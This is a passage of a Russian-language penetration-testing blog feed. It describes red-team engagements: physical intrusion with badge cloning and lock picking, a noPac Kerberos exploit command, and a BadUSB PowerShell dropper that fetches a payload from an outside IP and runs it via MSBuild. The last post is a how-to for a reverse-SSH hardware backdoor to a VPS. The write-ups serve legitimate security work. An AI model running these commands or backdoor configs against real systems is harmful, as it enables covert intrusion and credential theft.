  <p id="i1q1">Но на этом этапе &quot;Малину&quot; выдернули и исполнитель не смог продолжить дальнейшие работы. </p>
  <figure id="S0Ac" class="m_custom">
    <img src="https://img4.teletype.in/files/31/18/31182a03-df67-414b-80e2-5284dffbf5c0.png" width="658" />
  </figure>
  <p id="giiz">Возможно тут стоило заложить пару закладок на случай их обнаружения. В целом заказчик остался довольным. Получил рекомендации по усилению защиты и красивый отчет. </p>
  <figure id="UEns" class="m_custom">
    <img src="https://img3.teletype.in/files/a9/40/a940d641-8113-4b14-a6a7-deb9d42c8496.png" width="512" />
  </figure>
  <p id="1EUn">Этот кейс позволил трезво оценить возможные сценарии противодействия и поработать над ошибками. Всем хорошего дня и успешных проектов!</p>
  <p id="0Xcb"><strong>Ещё больше интересного в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/hXHHVdpGeyY</guid><link>https://teletype.in/@propentest/hXHHVdpGeyY?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/hXHHVdpGeyY?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Red Team Физика</title><pubDate>Mon, 01 Apr 2024 16:14:13 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/29/f6/29f6bb54-b0be-497a-9a02-d5dc0f8a264e.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/a2/ec/a2ec87e0-180e-458f-bd19-b571342e10d4.jpeg"></img>Всем Привет! Недавно закончился интересный проект, где задачей было физически проникнуть в компанию и выполнить ряд атак на сетевую инфраструктуру.]]></description><content:encoded><![CDATA[
  <figure id="Uivm" class="m_custom">
    <img src="https://img3.teletype.in/files/a2/ec/a2ec87e0-180e-458f-bd19-b571342e10d4.jpeg" width="725" />
  </figure>
  <p id="mMAV">Всем Привет! Недавно закончился интересный проект, где задачей было физически проникнуть в компанию и выполнить ряд атак на сетевую инфраструктуру.</p>
  <p id="Ttyg">Выражаю благодарность своим парням, которые выполняли этот долгий проект вместе со мной:</p>
  <p id="WgkU">@post_gatto - автор канала <a href="https://t.me/fck_harder" target="_blank">fck_harder</a></p>
  <p id="NQnN">@Romanov_ask - автор канала <a href="https://t.me/api_0" target="_blank">api_0</a></p>
  <p id="P83h">@KLON2000</p>
  <p id="i2o4">Также хотелось поблагодарить @OZOBBOZO - подсказал с инструментом и показал пару приемов для <strong>Lock picking </strong>в контексте нашего проекта</p>
  <p id="UrPr">Итак, наша задача заключалась в том, чтобы проникнуть в офис заказчика и поломать его инфраструктуру любым способом. Руки у нас были развязаны, но о проекте знал только руководитель технической дирекции.</p>
  <p id="qVIh">Наш проект мы с командой разбили на несколько этапов, давайте о каждом по-подробнее:</p>
  <p id="RgUG"><strong>Этап 1 - Разведка</strong></p>
  <p id="lgyW">На этом этапе мы выяснили все о компании, где она территориально располагается, какие есть у нее &quot;дочки&quot; и т.п. Попутно в ход идет поиск учеток в слитых базах, поиск телефонных номеров, страничек и аккаунтов в соц. сетях. </p>
  <p id="USZp">По итогу мы получили много полезной информации, но слитые учетки не подходили, как позже выяснилось, для аутентификации в домене. У нас была база телефонных номеров для проведения вишинга, подробная информация о некоторых сотрудниках - все это мы отложили на потом для социалки в случае если не получится выполнить инсайд.</p>
  <p id="WXbL"><strong>Этап 2 - Разведка цели по месту расположения</strong></p>
  <p id="QxbJ">На этом этапе один из сотрудников выполнил разведку рядом с офисом и частично внутри него, для того чтобы оценить:</p>
  <ul id="FoSA">
    <li id="LPEJ">Какие есть вектора для проникновения в обход СКУД</li>
    <li id="UTBK">На сколько бдительно охрана наблюдает за посетителями БЦ</li>
    <li id="qtuz">Куда ведет подземный паркинг</li>
    <li id="uTHK">Сопряженные организации, через которые возможно выполнить инсайд</li>
    <li id="x2fZ">Тип СКУД и возможность скопировать пропуск</li>
    <li id="MYNu">График смен охраны и график работы БЦ в целом</li>
    <li id="lsRb">Примерная оценка систем видеонаблюдения</li>
    <li id="ecZz">Различные факторы, которые могут помешать выполнить инсайд</li>
  </ul>
  <p id="6mL0">Вдобавок к визуальной оценке, специалист сделал фото/видео регистрацию своих действий, чтобы потом можно было проанализировать различные малозаметные моменты. </p>
  <p id="jfkC">Таких &quot;вылазок&quot; специалист совершил большое кол-во в виду того, что каждый раз находились различные препятствия для полной оценки защищенности периметра.</p>
  <p id="ytG9"><strong>Этап 3 - Подготовка базовых инструментов и гаджетов</strong></p>
  <figure id="JrV6" class="m_custom">
    <img src="https://img2.teletype.in/files/15/a1/15a1dc34-9b90-49da-b946-74461d639577.jpeg" width="700" />
  </figure>
  <p id="bNNo">На этом этапе @post_gatto склепал различные устройства:</p>
  <p id="Y2bU">- Система удаленного видеонаблюдения</p>
  <p id="jJdh">- Аппаратный бэкдор на основе малинки</p>
  <p id="Intg">- Bad USB</p>
  <p id="P9rN">Мы это посмотрели в книге <a href="http://@s0i37" target="_blank">Андрея Жукова </a>&quot;Физические атаки с использованием хакерских устройств&quot;</p>
  <p id="1WZq">Также специалист подготовил Флипперы для работы по СКУДу и другим атакам.</p>
  <p id="R7Sq">В рюкзаки мы также загрузи много всякой походной штуки, которая по умолчанию у нас должна быть: слесарный инструмент, малинки, ноуты, провода, альфы, заряженные смартфоны, флешки и т.п.</p>
  <figure id="yCuU" class="m_custom">
    <img src="https://img2.teletype.in/files/dd/cc/ddcc47cb-6561-4372-9b86-8a8f9b945188.jpeg" width="490" />
  </figure>
  <p id="i5x0"><strong>Этап 4 - Первые вылазки</strong></p>
  <p id="FajY">Этот проект оказался не таким тривиальным на первый взгляд. Мы ни как не могли получить первый пропуск. Работники носили их на шее или в кармане за толстыми пуховиками. Передвигались в курилку маленькими группами, подойти и так просто скопировать не получится без явного взаимодействия. </p>
  <p id="h56Y">Я предложил команде выбрать себе целевого сотрудника и походить за ним везде, в надежде на то, что выпадет случай прижаться где-нибудь в метро или автобусе чтобы скопировать его пропускную карту.</p>
  <p id="3IJS">Тогда @Romanov_ask предложил более быстрый вариант, который отработает идеально в контексте прошедших праздников:</p>
  <ul id="Jq5R">
    <li id="n9fN">Арендовать ростовую фигуру зверюшки</li>
    <li id="oMRs">Купить цветов и шоколадок</li>
    <li id="Vb0P">Дарить подготовленные подарки в честь празника 8 марта девушкам, которые являются сотрудницами целевой компании</li>
    <li id="9AaX">Выдавать приятный подарок по предъявлению корпоративного пропуска, который можно было скопировать через флиппер, спрятанный в лапе медведя.</li>
  </ul>
  <p id="mN8B">Мы с командой долго думали как все обставить &quot;красиво&quot;, но в одну вечернюю вылазку в выходной день, мы обнаружили на ресепшене пропуска, которые лежали без присмотра, охраны в этот момент не было. </p>
  <p id="7FaA">@post_gatto быстро скопировал несколько штук и ушел из БЦ.</p>
  <p id="OG1V"><strong>Этап 5 - Добыть пропуски на всю команду</strong></p>
  <figure id="Jool" class="m_custom">
    <img src="https://img1.teletype.in/files/83/dd/83dd2bd8-db7c-4463-bd63-52e7bddf1cc2.jpeg" width="576" />
  </figure>
  <p id="swvG"> @post_gatto разобрался пропускных карточках и смог сгенерировать несколько значений для словаря Флиппера. На последующих вылазках мы смогли добыть себе 4 валидных пропуска. Но первые скопированные со временем перестали быть активными. (это выяснилось на других этапах)</p>
  <p id="2dJR"><strong>Этап 6 - Первый инсайд</strong></p>
  <p id="xPzx">В субботний вечер наша команда, которая занималась этим проектом проникла в офис заказчика минуя СКУД по валидным пропускам и начала свою работу. Мы разбежались по разным этажам и первым делом начали собирать план помещений, фотографировать модели замочных скважин, если их не удавалось вскрыть, запоминали и отмечали всю важную информацию. </p>
  <p id="dPEC">В процессе проекта мы столкнулись с сложностями вскрытия различных замков, тогда мы купили себе подобные и началась история погружения в <strong>Lock picking.</strong></p>
  <p id="EqVd">До того дня я всегда вскрывал легкие замки у серверных шкафов и элементарный английский профиль в кабинетах. На помощь пришел - @OZOBBOZO и дал много важных и ценных советов, порекомендовал крутой инструмент, записал пару видео-уроков. В итоге мы с командой научились вскрывать целевые замки за недели 2, после уже взяли немного посложнее экземпляры, которые получалось открывать даже обычными скрепками, например как этого друга:</p>
  <figure id="cXhW" class="m_custom">
    <img src="https://img2.teletype.in/files/1c/90/1c9087ff-4711-4087-b37e-908fd906ca12.jpeg" width="426" />
  </figure>
  <p id="IwGQ"><strong>Этап 6 - Десятый инсайд</strong></p>
  <p id="2j1e">Наконец с примерно 10-й попытки нам удалось открыть целевые замки и выполнить поставленную задачу, у нас были доступы ко всем помещениям в организации, включая серверные комнаты. Оставалось несколько шагов до начала атаки на корпоративную инфраструктуру.</p>
  <p id="VDkz"><strong>Этап 7 - Получение доменных кред</strong></p>
  <figure id="FHHx" class="m_custom">
    <img src="https://img3.teletype.in/files/ee/f8/eef8a6ea-59a7-4276-9ee3-f0f726234910.jpeg" width="541" />
  </figure>
  <p id="hNiO">На этом этапе один из специалистов установил под потолком устройство, которое  являлось по-сути EvilTwin Wi-Fi точкой, чтобы перехватывать пользовательскую  аутентификацию. Тут нас ждал успех, мы получили несколько учеток открытым текстом, с которыми можно уже было работать дальше.</p>
  <p id="sqW1"><strong>Этап 8 - Атака на корпоративную инфраструктуру</strong></p>
  <p id="kwYa">Один из спецов приступил делать внутрянку через wi-fi, а несколько других начали ходить по офису и подключаться вместо принтеров/телефонов чтобы посмотреть другие сегменты сети.</p>
  <p id="VJkG">Попутно несколько пентестеров разложили гаджеты для удаленного видео-могниторинга по всему периметру офиса заказчика - это позволило контролировать охрану и людей, которые могли потенциально проявить интерес к нашим специалистам.</p>
  <p id="eLPR"><strong>Этап 9 - Аппаратный бэкдор</strong></p>
  <p id="DeCB">На этом этапе пентестер оставил малинку в качестве закладки и проложил туннель до внешней VPS. Попутно были установлены в системные блоки Bad USB, что позволяло нам всегда получать доступ к некоторым машинам в сети.</p>
  <p id="lJzH"><strong>Этап 10 - Взятие доменного администратора</strong></p>
  <p id="2sU0">Сама внутрянка оказалась несложной, получилось захватить домен через ESC6. Попутно были обнаружены и другие вектора атак, слабые пароли, некорректная сегментация сети, различные популярные &quot;язвы&quot; в инфраструктуре и т.п.</p>
  <p id="7ljX"><strong>Этап 11 - Празднование победы и формирование отчета</strong></p>
  <p id="vPhY">На этом этапе мы с командой отметили очередную победу, спасибо всем кто принимал участие и советом и делом. Я сделал небольшое <a href="https://youtu.be/1N5WyC1qwtI" target="_blank">видео</a> про наш проект, которое вы можете посмотреть в канале. Наш заказчик остался доволен, закрыл все свои проблемные места и теперь готов к таким вот инсайдерским атакам :)</p>
  <p id="zoxl"><strong> Ещё больше интересного в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/K2z54grXIFW</guid><link>https://teletype.in/@propentest/K2z54grXIFW?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/K2z54grXIFW?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Траблы с ручной эксплуатацией спуфинга sAMAccountName?</title><pubDate>Wed, 20 Mar 2024 12:35:19 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/e7/0c/e70c2889-ac46-4f52-bfa4-ce9580a5f562.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/50/ed/50ed116a-6bfb-49df-aaf2-7e64b3197a6e.png"></img>Всем Привет! Недавно столкнулся с трудностями эксплуатации ручным способом уязвимости noPac на своих лекциях по атакам на сетевую инфраструктуру. На проектах всего пару раз использовал ручной способ, а так пользовался всегда этим эксплоитом.]]></description><content:encoded><![CDATA[
  <figure id="oY3H" class="m_original">
    <img src="https://img2.teletype.in/files/50/ed/50ed116a-6bfb-49df-aaf2-7e64b3197a6e.png" width="780" />
  </figure>
  <p id="OlwB">Всем Привет! Недавно столкнулся с трудностями эксплуатации ручным способом уязвимости noPac на своих лекциях по атакам на сетевую инфраструктуру. На проектах всего пару раз использовал ручной способ, а так пользовался всегда этим <a href="https://github.com/Ridter/noPac.git" target="_blank"><strong>эксплоитом</strong></a>.</p>
  <p id="JpqB">Мануал по разбору данной вулны брал с <a href="https://habr.com/ru/articles/594923/" target="_blank"><strong>хабра</strong></a>.</p>
  <p id="urkc">Отдельная и большая благодарность<strong> <a href="https://habr.com/ru/users/snovvcrash/" target="_blank">@snovvcrash</a></strong> за оперативную помощь в решении вопроса!</p>
  <p id="c8va">Выполнял полностью все в соотвествии с инфструкцией на тачке с HTB. Ниже перечислены шаги, которые я выполнил:</p>
  <p id="srWT">Проверяем что сервер уязвим:</p>
  <figure id="t5JW" class="m_original">
    <img src="https://img2.teletype.in/files/56/f9/56f99b85-869c-4396-af74-f978bd513def.png" width="2000" />
  </figure>
  <p id="QuNa">Проверяем сколько тачек можем завести в домене:</p>
  <figure id="U2CO" class="m_original">
    <img src="https://img2.teletype.in/files/13/22/1322e8f2-1225-4a09-9e86-e8fe2828b977.png" width="2000" />
  </figure>
  <p id="jMA4">Добавляем и проверяем что Машинная УЗ создалась:</p>
  <figure id="ud3g" class="m_original">
    <img src="https://img1.teletype.in/files/44/38/4438b4e3-4a88-4cf3-89e0-a98443353f8e.png" width="2000" />
  </figure>
  <p id="2dPn">Меняем название тачки при помощи <a href="https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383" target="_blank">скрипта</a>:</p>
  <figure id="w4YZ" class="m_original">
    <img src="https://img3.teletype.in/files/21/cd/21cd11b3-bd05-42a3-ae29-8179623afe31.png" width="2000" />
  </figure>
  <p id="QrkI">Получаем <strong>TGT</strong> с помощью <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py" target="_blank">getTGT.py</a>:</p>
  <figure id="nsiZ" class="m_original">
    <img src="https://img4.teletype.in/files/bd/36/bd365d04-0db9-4f82-a95a-9e06d0c0e58d.png" width="2000" />
  </figure>
  <p id="0FsB">Меняем название тачки при помощи <a href="https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383" target="_blank">скрипта</a> обратно:</p>
  <figure id="LUVg" class="m_original">
    <img src="https://img4.teletype.in/files/74/41/7441ee7a-7656-4955-af0c-dd3a96783277.png" width="2000" />
  </figure>
  <p id="ohgv">Получаем <strong>TGS</strong> на Administrator (тут затык, пошел к автору данной статьи - <a href="https://habr.com/ru/users/snovvcrash/" target="_blank"><strong>@snovvcrash</strong></a>. Он очень быстро определил в чем была проблема, о которой будет написано немного ниже):</p>
  <figure id="rmXT" class="m_original">
    <img src="https://img2.teletype.in/files/97/f2/97f2a354-cf27-4260-9fc7-5b1f619f2a15.png" width="2000" />
  </figure>
  <p id="T2ks">Выполняем <strong>Dcync</strong>:</p>
  <figure id="ZrHC" class="m_original">
    <img src="https://img4.teletype.in/files/f9/ae/f9aed261-cac6-4fe3-8273-4eef5e6054c0.png" width="2000" />
  </figure>
  <p id="9VdH">Ничего не получается… Можете не обращать внимание на то, что вылетает у меня ошибка <strong>socket error or timeout</strong>, потому что хост был доступен, я выполнил попытку доступа через <a href="http://smbclient.py/" target="_blank"><strong>smbclient.py</strong></a> с машины, которая находилась в одной сети с <strong>DC</strong>, результат оставался такой же - билет невалидный:</p>
  <p id="mbGn">А если я эксплуатирую при помощи эксплоита, то все отрабатывает хорошо:</p>
  <p id="zdHK">Если используем <strong>noPac</strong>:</p>
  <figure id="RMac" class="m_original">
    <img src="https://img3.teletype.in/files/a9/0d/a90d0696-1b96-448e-a17a-aa8b1584a923.png" width="2000" />
  </figure>
  <p id="FJSg">У нас кешируется билетик, который мы можем переиспользовать вручную:</p>
  <figure id="ddlg" class="m_original">
    <img src="https://img3.teletype.in/files/e0/94/e094c379-8117-4e3d-84e3-4a78936864e7.png" width="2000" />
  </figure>
  <p id="24qj">Теперь время описать, что обнаружил <a href="https://habr.com/ru/users/snovvcrash/" target="_blank"><strong>@snovvcrash</strong></a>:</p>
  <ol id="HgBi">
    <li id="rP9l"><strong>service name</strong> неправильно проставляется почему-то, префикс службы <strong>CIFS</strong> не прописывается должным образом:</li>
  </ol>
  <figure id="KOae" class="m_original">
    <img src="https://img1.teletype.in/files/02/de/02de6431-c0e3-49be-b31d-f41bd47eeaed.png" width="2000" />
  </figure>
  <p id="VOy2">Должно быть так:</p>
  <figure id="pKa8" class="m_original">
    <img src="https://img3.teletype.in/files/a8/6b/a86ba02e-9060-4578-ac12-1a20a61deab3.png" width="2000" />
  </figure>
  <ol id="GeY2">
    <li id="oAU2">Исследователь обнаружил, что вот в этом коммите сломали предыдущее поведение: <a href="https://github.com/ThePorgs/impacket/commit/4dc134e30c0a4011278cdda3f720f0fc1b0764e9" target="_blank">https://github.com/ThePorgs/impacket/commit/4dc134e30c0a4011278cdda3f720f0fc1b0764e9</a></li>
  </ol>
  <p id="CYFT">И теперь когда выставляешь флаг <strong>-self</strong>, надо обязательно указывать явно имя службы:</p>
  <p id="MoQY"><code>python3 examples/getST.py -dc-ip 172.16.5.5 -spn &#x27;CIFS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL&#x27; -altservice &#x27;CIFS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL&#x27; inlanefreight.local/ACADEMY-EA-DC01 -k -no-pass -impersonate administrator -self</code></p>
  <p id="LmB3">Автор мануала вычислил это через сравнение коммитов:</p>
  <figure id="Ayxg" class="m_original">
    <img src="https://img1.teletype.in/files/85/d8/85d86fda-ee5d-4dbe-92f0-384993c4047a.png" width="2000" />
  </figure>
  <ol id="lwQm">
    <li id="h4B3">После выполнения команды выше, где мы явно прописываем <strong>SPN</strong> и у нас валидно запрашивается билет, далее мы можем выполнять, например, <strong>DCSync</strong> атаку:</li>
  </ol>
  <figure id="h92g" class="m_original">
    <img src="https://img4.teletype.in/files/ff/61/ff616b28-f81a-4f29-a312-8a84d3aa3ec5.png" width="2000" />
  </figure>
  <p id="qmwl"><strong>Еще больше интересных статей в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/6zuRBu2k4Rw</guid><link>https://teletype.in/@propentest/6zuRBu2k4Rw?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/6zuRBu2k4Rw?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Взлом АСУТП</title><pubDate>Tue, 20 Feb 2024 14:13:39 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/06/01/0601668f-87ea-4a31-98a2-622e1cb7a77c.png"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/0c/4f/0c4f3b05-dc35-451e-895d-647077486460.png"></img>В сегодняшнем обсуждении мы сфокусируемся на анализе физического пентестинга автоматизированных систем управления технологическими процессами (АСУТП).]]></description><content:encoded><![CDATA[
  <figure id="YHlX" class="m_custom">
    <img src="https://img1.teletype.in/files/0c/4f/0c4f3b05-dc35-451e-895d-647077486460.png" width="713" />
  </figure>
  <p id="JRNO"><strong>В сегодняшнем обсуждении мы сфокусируемся на анализе физического пентестинга автоматизированных систем управления технологическими процессами (АСУТП).</strong></p>
  <p id="67iq">В рамках данного кейса, ключевым методом первичного проникновения будет применение BadUSB устройства. Отметим, что для сохранения конфиденциальности заказчика, все лица причастные к этому и сценарии действий в примере были изменены с сохранением ключевого смысла.</p>
  <figure id="7DNd" class="m_custom">
    <img src="https://img4.teletype.in/files/70/6b/706bd6a2-68c6-487f-bde7-ce5a5be4f965.png" width="614" />
  </figure>
  <p id="wRY9">В процессе выполнения задачи, специалисту удалось успешно осуществить подключение BadUSB-устройства (<strong>в данном кейсе это был Flipper Zero</strong>) к компьютеру сотрудника <strong>ivanov_ii</strong>, что позволило получить удаленный доступ к системе с уровнем прав данного пользователя.</p>
  <p id="uBVM">В качестве первого шага, специалист разработал и подготовил <strong>специализированный код</strong>, предназначенный для последующего выполнения на целевом компьютере.</p>
  <p id="JEk7">Этап создания вредоносного кода направлен на установку<strong> удаленного соединения</strong></p>
  <p id="fQpr">При внедрении <strong>BadUSB-устройства</strong> в систему, следующий шаг процесса запускается автоматически и происходит с высокой скоростью. Данная операция, известная как действие <strong>дроппера</strong>, включает в себя загрузку ранее созданного вредоносного кода с удаленного сервера. Затем, с использованием встроенной утилиты <strong>MSBuild.exe</strong> операционной системы <strong>Windows</strong>, осуществляется инициация запуска кода. <strong>Процесс проходит незаметно</strong>: системные предупреждения не активируются, а программное обеспечение антивирусной защиты не фиксирует никаких нарушений.</p>
  <pre id="72yr">powershell -w h -NoP -NonI -Ep Bypass -c &quot;iwr http://125.125.125.125:8000/payload.xml -o C:\Users\Public\payload.xml; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Public\payload.xml&quot;</pre>
  <p id="rA0n">Затем, специалист успешно осуществил подключение BadUSB устройства к рабочему компьютеру сотрудника. В результате этого действия, в правом нижнем углу экрана автоматически активировалось исполнение комбинации клавиш &quot;Win + R&quot;, что привело к запуску предварительно заданной команды (дроппер). Реализация данной атаки, занимавшая всего 4-5 секунд, позволила исполнителю получить удаленный доступ к системе под учетной записью сотрудника, на компьютере которого было произведено подключение.</p>
  <p id="wlHJ">Процесс подключения BadUSB устройства к компьютеру сотрудника инициировал запрос на скачивание вредоносного кода с удаленного HTTP-сервера специалиста.</p>
  <p id="N5a2">В результате активации и выполнения вредоносного кода через BadUSB, специалисту удалось инициировать сессию под учетными данными пользователя <strong>ivanov_ii</strong>.</p>
  <p id="k0Bi">После успешного получения прав администратора на устройстве сотрудника <strong>ivanov_ii</strong>, специалисту удалось извлечь учетные данные для всех Wi-Fi сетей, к которым это устройство ранее подключалось, в том числе и к корпоративной сети заказчика под названием <strong>Corp_WiFi</strong>.</p>
  <figure id="W1hv" class="m_custom">
    <img src="https://img2.teletype.in/files/96/bd/96bd69d9-e383-489c-860e-8e381ae02f5e.png" width="699" />
  </figure>
  <p id="Wqu2">После успешной аутентификации с использованием пароля доменной учетной записи<strong> ivanov_ii</strong> и последующего подключения к удаленному рабочему столу сотрудника, специалист выявил наличие примонтированных файловых серверов в системном проводнике с полезной и конфедециальной информацией.</p>
  <p id="cDBq">Но на этом не все ведь у нас есть в распоряжении целый ПК.</p>
  <figure id="rJKO" class="m_custom">
    <img src="https://img3.teletype.in/files/23/48/2348454f-9b2b-464d-957d-78c5d3486091.png" width="734" />
  </figure>
  <p id="hgRJ">В ходе тщательно спланированных операций, специалисту удалось обеспечить физический доступ к компьютеру сотрудника <strong>petrov_aa</strong>. Отсутствие пароля на BIOS и шифрования дисков открыло двери для беспрепятственной загрузки операционной системы Kali Linux, которая была специально подготовлена для этой задачи. Специалист смог смонтировать системный диск Windows и обеспечил доступ к критически важным доменным и локальным учетным записям, хранящимся на нем.</p>
  <p id="VOar">Первым шагом было выключение целевого компьютера и подключение флешки с Kali Linux. После входа в BIOS и активации опции загрузки с USB-устройств, флешка стала доступна в меню выбора приоритета загрузки, что позволило успешно загрузить Kali Linux на устройстве сотрудника.</p>
  <p id="U9au">С помощью инструмента <strong>GParted</strong>, специалист идентифицировал системный диск Windows, отформатированный в <strong>NTFS</strong>, и произвел его монтирование. Это действие открыло доступ к файловой системе Windows, где были обнаружены ключевые файлы конфигурации: <strong>SAM</strong>, <strong>SECURITY</strong>, <strong>SYSTEM</strong>, необходимые для дальнейшего извлечения учетных данных.</p>
  <p id="qEOU">Доступ к этим файлам позволил специалисту извлечь ценные локальные и доменные учетные записи, обеспечив тем самым фундамент для последующих атак.</p>
  <p id="llbs">Интересным моментом стало обнаружение, что учетная запись администратора была отключена. Однако, благодаря доступу к доменной учетной записи, специалист реализовал атаку <strong>Silver</strong> <strong>Ticket</strong>, создав поддельный сервисный билет на сервис <strong>HOST</strong> с правами доменного администратора <strong>admin_ss</strong>. Это дало возможность для аутентификации по Kerberos с применением поддельного сервисного билета.</p>
  <p id="xCc5">После успешной атаки, специалист изменил пароль локального администратора и активировал его учетную запись, что позволило успешно аутентифицироваться под новыми учетными данными.</p>
  <p id="QbvP"><strong>Завершающим аккордом стало отключение учетной записи локального администратора и восстановление пароля администратора.</strong></p>
  <figure id="LEu7" class="m_custom">
    <img src="https://img2.teletype.in/files/d9/bd/d9bd769f-221d-4499-838f-7176a7cfc589.png" width="745" />
  </figure>
  <p id="zoxl"><strong>Еще больше интересных статей в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/Ova5zkh3MUW</guid><link>https://teletype.in/@propentest/Ova5zkh3MUW?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/Ova5zkh3MUW?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Аппаратный БЭКДОР</title><pubDate>Mon, 29 Jan 2024 09:01:11 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/2e/5a/2e5a4769-1ae2-469f-b942-1b400f2cf9c1.png"></media:content><category>Обучение</category><description><![CDATA[<img src="https://img2.teletype.in/files/9b/48/9b4818b2-d371-4466-8d87-99287effc9a4.png"></img>Данная статья была разработана моим коллегой Николаем Лысяковым - @KLON2000]]></description><content:encoded><![CDATA[
  <figure id="DdjJ" class="m_custom">
    <img src="https://img2.teletype.in/files/9b/48/9b4818b2-d371-4466-8d87-99287effc9a4.png" width="703" />
    <figcaption>Бэкдор</figcaption>
  </figure>
  <p id="y5FP"><strong>Данная статья была разработана моим коллегой Николаем Лысяковым - @KLON2000</strong></p>
  <p id="Ibon">Добрый день друзья, в статье про работы на высоте (<a href="https://teletype.in/@r00t_owl/2vFmJb4gRX6" target="_blank">https://teletype.in/@r00t_owl/2vFmJb4gRX6</a>) мы (@r00t_owl и @KLON2000) говорили Вам , что мы оставили аппартаный бекдор в виде Raspberry Pi в сети заказчика и продолжали удаленно работать.</p>
  <p id="blfC">В этой статье мы опишем Вам как это сделать.</p>
  <p id="lAmL">Для примера я буду показывать на обычной Kali, так как наша “малинка” в данный момент находится на проекте, но у нее все происходит аналогично.</p>
  <p id="z17N">Суть заключается в том, что вы подключаете usb-модем с заряженой симкой к ноутбуку, малинке или чему-то еше, и раземещаете устройство во внутреннюю сети заказчика. Далее настраиваете маршруты, чтобы трафик который будет идти наружу проходил через usb-модем, а трафик который будет проходить внутрь - шел через eth (по проводу). В идеале нужно еще обойти Port Security и помаксимуму замоскировать свою тачку (У каждого специалиста свое мнение на этот счет, поэтому расписывать не стал), чтобы вас не заметили в сети.</p>
  <p id="e45m">Порядок действий для создания аппаратного бэкдора:</p>
  <p id="pMwh">Мы будем поднимать ssh службу, которая автоматически будет восстанавливать соединение при разрыве. И получать доступ к ней удаленно, используя хоп через VPS.</p>
  <p id="rDSY">1. Для начала на нашей кали создаем файл в /etc/default/secure-tunnel@ip_or_dns_you_vps :</p>
  <pre id="3ns9">TARGET=ip_or_dns_you_vps
LOCAL_PORT=22
# port that will be use to ssh at remote server
REMOTE_PORT=22222
# change username
USERNAME=username
SSH_TARGET_PORT=22
</pre>
  <p id="YlB9">2. Затем создаем файл в /etc/systemd/system/secure-tunnel@.service :</p>
  <pre id="4iNN">Description=Setup a secure tunnel to %I
After=network.target

[Service]
Environment=&quot;LOCAL_ADDR=localhost&quot;
EnvironmentFile=/etc/default/secure-tunnel@%i
ExecStart=/usr/bin/ssh -NT -o ServerAliveInterval=60 -o ExitOnForwardFailure=yes -R ${REMOTE_PORT}:localhost:${LOCAL_PORT} ${USERNAME}@${TARGET}
#Это если есть авторан#Environment=&quot;AUTOSSH_GATETIME=0&quot;
#Это если есть авторан#ExecStart=/usr/bin/autossh -M 0 -o &quot;ExitOnForwardFailure=yes&quot; -o &quot;ServerAliveInterval 30&quot; -o &quot;ServerAliveCountMax 3&quot; -NR ${REMOTE_PORT}:${LOCAL_ADDR}:${LOCAL_PORT} -p ${SSH_TARGET_PORT} ${USERNAME}@${TARGET}

# Restart every &gt;2 seconds to avoid StartLimitInterval failure
RestartSec=5
Restart=always
[Install]
WantedBy=multi-user.target
</pre>
  <p id="NZZ2">Здесь мы можем использовать либо просто shh, либо autossh. Я буду использовать первый вариант.</p>
  <p id="IBvK">В нашем случае наша кали будет приходить на VPS и открывать 22222 порт, при обращении на который мы будем получать доступ к кали.</p>
  <p id="BEGh">3. Затем вам нужно скопировать ваш открытый ключ в .ssh/known_hosts.</p>
  <p id="WLVt">4. В кали вам нужно поставить права на id_rsa, от пользователя с которого будете работать(либо /home/user/.ssh либо /root/.ssh):</p>
  <pre id="LBwm">sudo chmod 600 id_rsa
sudo chown user:user /home/user/.ssh/id_rsa
</pre>
  <p id="xSoB">5. Затем делаем перезапуск демона и запускаем службу:</p>
  <pre id="abxg">systemctl daemon-reload
systemctl start secure-tunnel@yourjumpsshserver
systemctl status secure-tunnel@yourjumpsshserver
</pre>
  <figure id="GTPq" class="m_custom">
    <img src="https://img2.teletype.in/files/95/16/9516271f-901e-4941-8ac5-dc2554b14f2a.png" width="706" />
    <figcaption>Статус запущенной службы</figcaption>
  </figure>
  <p id="bF6m">5.1 Если у вас будет disable and code-exited, то выполняйте команду в ручную и смотрите на каком моменте у вас крашится:</p>
  <pre id="MLTK">/usr/bin/ssh -Nt -o ServerALiveInterval ..... -v
</pre>
  <p id="BFH5">5.2) Не забываем включить shh на Кали.</p>
